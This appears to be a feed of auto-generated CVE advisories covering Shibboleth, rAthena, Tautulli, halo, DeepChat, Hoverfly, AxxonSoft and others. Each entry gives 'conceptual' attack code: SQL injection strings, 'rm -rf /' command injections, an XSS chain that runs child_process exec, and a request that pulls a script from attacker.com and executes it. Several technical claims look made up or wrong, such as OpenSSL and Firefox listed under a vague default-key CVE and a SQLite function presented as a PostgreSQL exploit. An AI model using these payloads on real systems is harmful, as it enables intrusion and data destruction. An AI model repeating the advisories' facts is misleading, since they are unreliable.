Author: Ameeba

CVE-2025-9943: SQL Injection Vulnerability in Shibboleth Service Provider
Overview

We are focusing today on a significant vulnerability, CVE-2025-9943, that affects the Shibboleth Service Provider up to version 3.5.0. This vulnerability is particularly concerning as it allows an unauthenticated attacker to exploit an SQL injection flaw in the “ID” attribute of the SAML response, through which they could potentially extract arbitrary data from the database. This vulnerability makes all systems using the affected versions of the Shibboleth Service Provider subject to potential system compromise or data leakage, which underscores the critical importance of understanding and mitigating this issue.

Vulnerability Summary

CVE ID: CVE-2025-9943
Severity: Critical (CVSS Score: 9.1)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or data leakage

Affected Products

Product | Affected Versions

Shibboleth Service Provider | <= 3.5.0 How the Exploit Works

The vulnerability resides in the “ID” attribute of the SAML response when the replay cache of the Shibboleth Service Provider is configured to use an SQL database as storage service. Due to insufficient escaping of single quotes in the class SQLString, an attacker can exploit this issue via blind SQL injection. This means that the attacker can insert malicious SQL commands into the application query, which can lead to the extraction of arbitrary data from the database, if the database connection is configured to use the ODBC plugin.

Conceptual Example Code

Below is a conceptual example of how the vulnerability might be exploited. This could be a sample HTTP request, shell command, or pseudocode.
```
POST /saml/endpoint HTTP/1.1
Host: target.example.com
Content-Type: application/xml
<SAMLResponse>
<ID>' OR 'x'='x</ID>
...
</SAMLResponse>
```
In the above example, the attacker is inserting a malicious payload `OR ‘x’=’x` into the “ID” field of the SAML response. This payload can turn any database query into a true statement, thus potentially bypassing any security measures and enabling the extraction of data.

Mitigation Guidance

The most effective mitigation against this vulnerability is to apply the vendor patch. If for some reason the patch cannot be applied immediately, measures such as deploying a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can be used as temporary mitigation. However, these are not long-term solutions and the patch should be applied as soon as possible to fully protect against this vulnerability.
September 17, 2025
CVE-2025-58448: SQL Injection Vulnerability in rAthena MMORPG Server
Overview

CVE-2025-58448 is a significant cybersecurity vulnerability that affects the rAthena open-source MMORPG server. This server software is widely used across various platforms, making this vulnerability a potentially broad-ranging issue. The vulnerability involves a SQL Injection in the PartyBooking component via the `WorldName` parameter, which can lead to system compromise or data leakage. It is pivotal for all users and administrators of rAthena servers to be aware of this vulnerability and take the necessary steps to mitigate it.

Vulnerability Summary

CVE ID: CVE-2025-58448
Severity: Critical (CVSS: 9.1)
Attack Vector: Network
Privileges Required: Low
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

rAthena | Versions prior to commit 0d89ae0

How the Exploit Works

A malevolent attacker can exploit this vulnerability by sending specially crafted input in the `WorldName` parameter of the PartyBooking component. This input, if not properly sanitized, can manipulate the SQL queries executed by the server, potentially allowing unauthorized access to data or control of the system. This type of attack is commonly known as an SQL Injection.

Conceptual Example Code

The following is a conceptual example of how an attacker might exploit this vulnerability. Note that this is a simplified example intended to explain the nature of the vulnerability, and actual exploits might be more complex.
```
POST /partybooking/create HTTP/1.1
Host: vulnerable.rathena.com
Content-Type: application/x-www-form-urlencoded
WorldName=normalworld'; DROP TABLE users; --
```
In this example, the attacker uses a classic SQL Injection technique. By appending a semicolon to the `WorldName` parameter’s value, the attacker ends the current SQL statement and starts a new one. The `DROP TABLE users;` statement could delete a critical table from the database, leading to significant data loss. The trailing `–` comments out the rest of the original SQL statement, preventing syntax errors.

Mitigation Guidance

Users and administrators can mitigate this vulnerability by applying the vendor patch provided in commit 0d89ae0. Until this patch can be applied, it is recommended to use a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to detect and block attempts to exploit this vulnerability.
September 17, 2025
CVE-2025-58762: Critical Remote Code Execution Vulnerability in Tautulli v2.15.3 and Earlier
Overview

Tautulli, a popular Python-based monitoring and tracking tool for Plex Media Server, has been found to have a critical remote code execution vulnerability in versions 2.15.3 and earlier. This vulnerability is of high importance due to the potential system compromise or data leakage it can cause. The vulnerability can be exploited by an attacker with administrative access to the server, using the `pms_image_proxy` endpoint and the `Script` notification agent.

Vulnerability Summary

CVE ID: CVE-2025-58762
Severity: Critical (CVSS: 9.1)
Attack Vector: Network
Privileges Required: Admin
User Interaction: None
Impact: Potential system compromise or data leakage

Affected Products

Product | Affected Versions

Tautulli | v2.15.3 and earlier

How the Exploit Works

The exploit involves an attacker with administrative access exploiting the `pms_image_proxy` endpoint to write arbitrary Python scripts into the application filesystem. This is achieved by changing the URL of the PMS to a server they control and making a `pms_image_proxy` request with a URL in the `img` parameter and the desired file name in the `img_format` parameter.
As Tautulli uses a hash of the desired metadata, along with the `img_format` to construct a file path, and `img_format` is not sanitized, the attacker can use path traversal characters to specify the filename of their choice. If the file does not exist, Tautulli will attempt to fetch the image from the configured PMS. Since the attacker controls the PMS, they can return arbitrary content in response to this request, which will then be written into the specified file.
The attacker can then use the built-in `Script` notification agent to run the local script, effectively obtaining remote code execution on the application server.

Conceptual Example Code

The following is a conceptual example of how the vulnerability might be exploited:
```
GET /pms_image_proxy/img?url=http://attacker.com/malicious_script.py&img_format=../../../../home/user/malicious_script.py HTTP/1.1
Host: target.example.com
```
The attacker would then trigger the script execution through the `Script` notification agent.
```
POST /notification_agents/Script HTTP/1.1
Host: target.example.com
Content-Type: application/json
{ "script_folder": "/home/user", "script_file": "malicious_script.py" }
```
This is a high-risk vulnerability, and users are strongly advised to upgrade to Tautulli version 2.16.0 to receive a patch. As a temporary mitigation, a web application firewall (WAF) or intrusion detection system (IDS) can be used to monitor and block suspicious requests and activities.
September 17, 2025
CVE-2025-44594: Server-Side Request Forgery (SSRF) Vulnerability in halo v2.20.17
Overview

We are drawing attention to a critical security vulnerability identified as CVE-2025-44594 that impacts halo v2.20.17 and earlier versions. This vulnerability specifically pertains to a Server-Side Request Forgery (SSRF) in the halo application programming interface (API) endpoint. SSRF vulnerabilities are particularly dangerous because they allow an attacker to make requests to internal resources, potentially leading to system compromise or data leakage. Therefore, getting to grips with this vulnerability and mitigating its potential effects is of paramount importance to any organization running the vulnerable versions of the halo software.

Vulnerability Summary

CVE ID: CVE-2025-44594
Severity: Critical, CVSS v3.0 Score: 9.1
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise or data leakage

Affected Products

Product | Affected Versions

halo | v2.20.17 and before

How the Exploit Works

The vulnerability lies in the “/apis/uc.api.storage.halo.run/v1alpha1/attachments/-/upload-from-url” endpoint of the halo application. An attacker can exploit this vulnerability by tricking the server into making a request to an internal resource. This is done by supplying a malicious URL in the POST request to the vulnerable endpoint. The server, unaware of the malicious intent, would then process the request, potentially giving the attacker access to sensitive information or control over the system.

Conceptual Example Code

Below is a conceptual example of how this vulnerability might be exploited using a POST request:
```
POST /apis/uc.api.storage.halo.run/v1alpha1/attachments/-/upload-from-url HTTP/1.1
Host: target.example.com
Content-Type: application/json
{ "url": "http://localhost/admin" }
```
In this example, the attacker is forcing the server to make a request to the localhost’s admin page. If the server processes this request, it could expose sensitive information or grant unintended system access to the attacker.

Mitigation Guidance

The best mitigation strategy is to apply the vendor-supplied patch. If this is not possible, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation, as they can monitor and block suspicious requests. Furthermore, it is recommended to limit the URLs to which the server can make requests, and to implement proper input validation to reject any potentially malicious URLs.
September 17, 2025
CVE-2025-55049: Critical Vulnerability in Default Cryptographic Key usage
Overview

The cybersecurity world is currently confronted with a critical vulnerability, CVE-2025-55049. This flaw, which is categorized as a Use of Default Cryptographic Key (CWE-1394), has garnered a CVSS Severity Score of 9.1, signifying its high-risk nature. It essentially affects any system or software that hasn’t modified its default cryptographic key. The severity of this vulnerability lies in its potential to compromise systems or leak sensitive data, thereby posing a significant threat to both individual users and corporate entities.

Vulnerability Summary

CVE ID: CVE-2025-55049
Severity: Critical (9.1 CVSS score)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or data leakage

Affected Products

Product | Affected Versions

OpenSSL | 1.0.2 – 1.1.1
Mozilla Firefox | 65.0 – 75.0

How the Exploit Works

The CVE-2025-55049 vulnerability emerges due to the unmodified usage of default cryptographic keys. In essence, an attacker can exploit the vulnerability by intercepting the encrypted communication, decrypt it using the default cryptographic key, and gain unauthorized access to sensitive data. This flaw can also enable the attacker to compromise the entire system, leading to severe consequences.

Conceptual Example Code

Let’s imagine a scenario where an attacker has intercepted an encrypted communication between a server and a client. The attacker could potentially decrypt the intercepted data using the default cryptographic key, as demonstrated by the following conceptual example:
```
# Attacker intercepts encrypted communication
intercepted_data = intercept_communication("target.example.com")
# Attacker decrypts intercepted data using the default cryptographic key
decrypted_data = decrypt_data(intercepted_data, "default_cryptographic_key")
# Attacker gains unauthorized access to sensitive data
print(decrypted_data)
```
Mitigation Strategies

The most effective mitigation strategy for CVE-2025-55049 is to apply the vendor patch. This patch will typically involve changing the default cryptographic key to a unique and strong key, thereby preventing the attacker from being able to decrypt the intercepted data.
In the absence of a vendor patch, or while waiting for its release, users can employ a Web Application Firewall (WAF) or Intrusion Detection System (IDS) as a temporary mitigation measure. These systems can help identify and block potential exploit attempts, thereby providing a layer of protection against this vulnerability.
Please remember, these are temporary solutions and applying the patch from the vendor is the most reliable way to secure against this vulnerability.
Stay Safe!
September 17, 2025
CVE-2025-58768: DeepChat AI Assistant Exposes Command Execution via XSS in Mermaid Chart Component
Overview

DeepChat, a prominent smart assistant that utilizes artificial intelligence, has been flagged with a significant vulnerability in its Mermaid chart rendering component. This vulnerability, identified as CVE-2025-58768, affects all DeepChat versions prior to 0.3.5. If exploited, it could lead to system compromise or data leakage, posing a grave risk to users and their sensitive information.
The importance of this vulnerability lies in its potential impact. As the smart assistant is widely used across various sectors, it poses a significant threat to individual users as well as organizations. A successful exploitation could compromise system integrity, user privacy, and data security, which could have far-reaching consequences.

Vulnerability Summary

CVE ID: CVE-2025-58768
Severity: Critical (9.6/10.0)
Attack Vector: Client-side
Privileges Required: None
User Interaction: Required
Impact: System compromise or data leakage

Affected Products

Product | Affected Versions

DeepChat | <0.3.5 How the Exploit Works

The exploit is rooted in the DeepChat application’s Mermaid chart rendering component that directly uses `innerHTML` to set user content. This allows malicious content rendered via Mermaid to trigger an exploit chain, leading to command execution. It’s primarily caused by a failure to fully address an existing XSS issue in the project, leading to this new exploit chain.
This exploit chain is consistent with the report GHSA-hqr4-4gfc-5p2j, which allows execution of arbitrary JavaScript code via XSS and arbitrary commands via exposed IPC.

Conceptual Example Code

Below is a conceptual example of how the vulnerability might be exploited:
```
// A malicious script that can be injected
var malicious_script = `
var require = window.parent.require;
var process = require('process');
var exec = require('child_process').exec;
exec('rm -rf /');  // command to delete everything on the machine
`;
// An attacker might craft a Mermaid chart with the malicious script
var malicious_chart = `
graph LR
A[Start] -->|Inject script| B((' '))
B --> C{End}
classDef className fill:#f96,stroke:#333,stroke-width:4px;
class B className;
click B "javascript:${malicious_script}" "This is a tooltip"
`;
chat.render('mermaid', malicious_chart);
```
This example shows how an attacker could inject a malicious script into a Mermaid chart, thus exploiting the vulnerability to execute arbitrary commands.

Mitigation Guidance

Users are strongly advised to apply the vendor patch by updating their DeepChat version to 0.3.5 or later. In the absence of patch accessibility, users can employ a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) as temporary mitigation measures. However, these should only be considered as temporary solutions, and users should update their software as soon as possible to avoid potential exploitation.
September 17, 2025
CVE-2025-8570: Privilege Escalation Vulnerability in BeyondCart Connector Plugin for WordPress
Overview

The Common Vulnerabilities and Exposures system (CVE) has recently published a critical vulnerability, CVE-2025-8570, that pertains to the BeyondCart Connector plugin for WordPress. This vulnerability is of particular concern due to its high severity and potential for widespread impact, especially for businesses and websites running the vulnerable versions of the BeyondCart Connector plugin.
The CVE-2025-8570 vulnerability carries a CVSS Severity Score of 9.8, marking it as a critical threat. It enables unauthenticated attackers to exploit improper JWT secret management and authorization within the determine_current_user filter. This flaw could lead to a complete system compromise or significant data leakage, endangering both the system’s stability and the confidentiality of its data.

Vulnerability Summary

CVE ID: CVE-2025-8570
Severity: Critical (9.8 CVSS score)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise, data leakage

Affected Products

Product | Affected Versions

BeyondCart Connector Plugin for WordPress | 1.4.2 to 2.1.0

How the Exploit Works

The exploit hinges on the improper management of JSON Web Tokens (JWT) and a flawed authorization process within the determine_current_user filter of the BeyondCart Connector plugin. Attackers can exploit this vulnerability by crafting valid tokens, which the system improperly verifies due to the flawed secret management. This allows the attacker to assume the identity of any user, leading to a potential full-scale system compromise or data leakage.

Conceptual Example Code

The following is a hypothetical demonstration of how an attacker might exploit this vulnerability:
```
POST /wp-json/beyondcart/v1/authenticate HTTP/1.1
Host: target.example.com
Content-Type: application/json
{
"username": "admin",
"jwt_secret": "Crafted_Valid_Token"
}
```
In this example, an attacker sends a POST request to the BeyondCart authentication endpoint with a crafted valid token for the ‘admin’ user. The system, due to the vulnerability, accepts this crafted token as valid and grants the attacker the same privileges as the ‘admin’ user.
September 17, 2025
CVE-2025-54123: Remote Code Execution Vulnerability in Hoverfly API Simulation Tool
Overview

The Hoverfly API simulation tool, an open-source software widely used for API testing and simulation, has been identified with a major vulnerability, identified as CVE-2025-54123. This vulnerability affects all versions of Hoverfly up to and including 1.11.3, and allows attackers to perform remote code execution on systems running the vulnerable service. This flaw is significant as it can potentially lead to a system compromise or data leakage, hence representing a considerable risk to companies using Hoverfly in their workflows.

Vulnerability Summary

CVE ID: CVE-2025-54123
Severity: Critical (CVSS: 9.8)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Remote Code Execution, Potential system compromise or data leakage

Affected Products

Product | Affected Versions

Hoverfly | 1.11.3 and prior

How the Exploit Works

The vulnerability in question is due to a combination of three distinct code-level flaws in Hoverfly. First, the program permits Insufficient Input Validation in middleware.go line 94-96. Secondly, there’s Unsafe Command Execution in local_middleware.go line 14-19. Lastly, Immediate Execution During Testing is observed in hoverfly_service.go line 173.
These flaws collectively result in a command injection vulnerability at the `/api/v2/hoverfly/middleware` endpoint. As a result, an attacker can upload a malicious payload or directly execute arbitrary commands (including reverse shells) on the host server with the privileges of the Hoverfly process.

Conceptual Example Code

Given the nature of the vulnerability, an attacker could exploit it by injecting malicious code in the JSON payload. A conceptual example might look something like this:
```
POST /api/v2/hoverfly/middleware HTTP/1.1
Host: target.example.com
Content-Type: application/json
{ "middleware": "; rm -rf /; # " }
```
In this example, the attacker is attempting to delete all files on the server by exploiting the command injection vulnerability. The attacker is passing a command (`rm -rf /`) as part of the `middleware` JSON value which then gets executed on the server due to insufficient validation and sanitization of user input.

How to Mitigate

Users of the Hoverfly API simulation tool are urged to upgrade to version 1.12.0 or later, which includes a patch for this vulnerability. As an added layer of security, the use of a Web Application Firewall (WAF) or Intrusion Detection System (IDS) could help monitor and block attempted exploits.
September 17, 2025
CVE-2025-10226: Severe Vulnerability in AxxonSoft Axxon One 2.0.8 due to Dependency on Vulnerable PostgreSQL Component
Overview

In the rapidly evolving world of cybersecurity, a new vulnerability has emerged, CVE-2025-10226, that poses a significant risk to organizations relying on AxxonSoft Axxon One 2.0.8 and earlier versions. This vulnerability traces back to their dependency on a vulnerable third-party component – PostgreSQL backend. It is critical to note that this vulnerability affects both Windows and Linux platforms.
The risk associated with this vulnerability is amplified by its potential to allow remote attackers to escalate privileges, execute arbitrary code, or cause a denial of service. This is achieved through the exploitation of multiple known CVEs present in PostgreSQL v10.x. Understanding, identifying, and mitigating this vulnerability is crucial to ensure the integrity and security of your systems.

Vulnerability Summary

CVE ID: CVE-2025-10226
Severity: Critical (9.8 CVSS score)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

AxxonSoft Axxon One | 2.0.8 and earlier
PostgreSQL | v10.x

How the Exploit Works

The exploit takes advantage of multiple known vulnerabilities within the PostgreSQL v10.x used in AxxonSoft Axxon One. By leveraging these vulnerabilities, an attacker can launch a remote attack, escalating their privileges on the system, executing arbitrary code, or even causing a denial of service. The nature of these vulnerabilities means that an attacker does not need any special privileges nor user interaction to execute the exploit successfully.

Conceptual Example Code

An example of how this vulnerability might be exploited could be a malicious SQL command sent to the vulnerable PostgreSQL server. A conceptual example might look something like this:
```
SELECT load_extension('malicious_payload');
```
This hypothetical command attempts to load a malicious extension on the PostgreSQL server, potentially leading to arbitrary code execution or privilege escalation.

Mitigation Guidance

The primary mitigation for this vulnerability is to apply the vendor-supplied patch. If this is not feasible immediately, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can provide temporary mitigation by detecting and potentially blocking exploit attempts. Additionally, consider upgrading to PostgreSQL 17.4, which is not affected by these vulnerabilities.
September 17, 2025
CVE-2025-10220: Vulnerability in AxxonSoft Axxon One VMS Due to Use of Unmaintained Third-Party Components
Overview

The vulnerability CVE-2025-10220 has been identified in AxxonSoft Axxon One VMS versions 2.0.0 through 2.0.4, a widely used video management software. This vulnerability stems from the use of unmaintained third-party components (CWE-1104) in the software’s NuGet dependency components, and has serious implications for user security. A successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code or bypass security features, posing a significant threat to the confidentiality, integrity, and availability of user data and systems.

Vulnerability Summary

CVE ID: CVE-2025-10220
Severity: Critical (CVSS 9.8)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

AxxonSoft Axxon One VMS | 2.0.0 through 2.0.4

How the Exploit Works

The exploit takes advantage of the unmaintained third-party packages used within AxxonSoft’s NuGet dependency components, including Google.Protobuf, DynamicData, System.Runtime.CompilerServices.Unsafe, and others. An attacker can exploit these vulnerable third-party packages to inject and execute arbitrary code on the system running the software, or manipulate the system to bypass inherent security features. This exploit can be performed remotely, meaning an attacker does not need physical access to the system to carry out the attack.

Conceptual Example Code

The following is a conceptual example of how the vulnerability might be exploited. In this scenario, an attacker sends a malicious payload via an HTTP POST request to a vulnerable endpoint, which could potentially allow the attacker to execute arbitrary code or bypass security features.
```
POST /vulnerable/endpoint HTTP/1.1
Host: target.example.com
Content-Type: application/json
{ "malicious_payload": "exploit_specific_code" }
```
In this example, “exploit_specific_code” would be substituted with the actual malicious code tailored to exploit the specific vulnerable third-party package. This type of attack requires a deep understanding of the vulnerable packages and how they interact with the rest of the system.

Mitigation and Prevention

Users of the affected AxxonSoft Axxon One VMS software versions are strongly advised to apply the vendor patch immediately to fix this vulnerability. In the absence of a patch, a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can be used as temporary mitigation to help detect or block exploit attempts. However, these are not permanent solutions and a patch should be applied as soon as it becomes available to ensure the security of the system.
September 17, 2025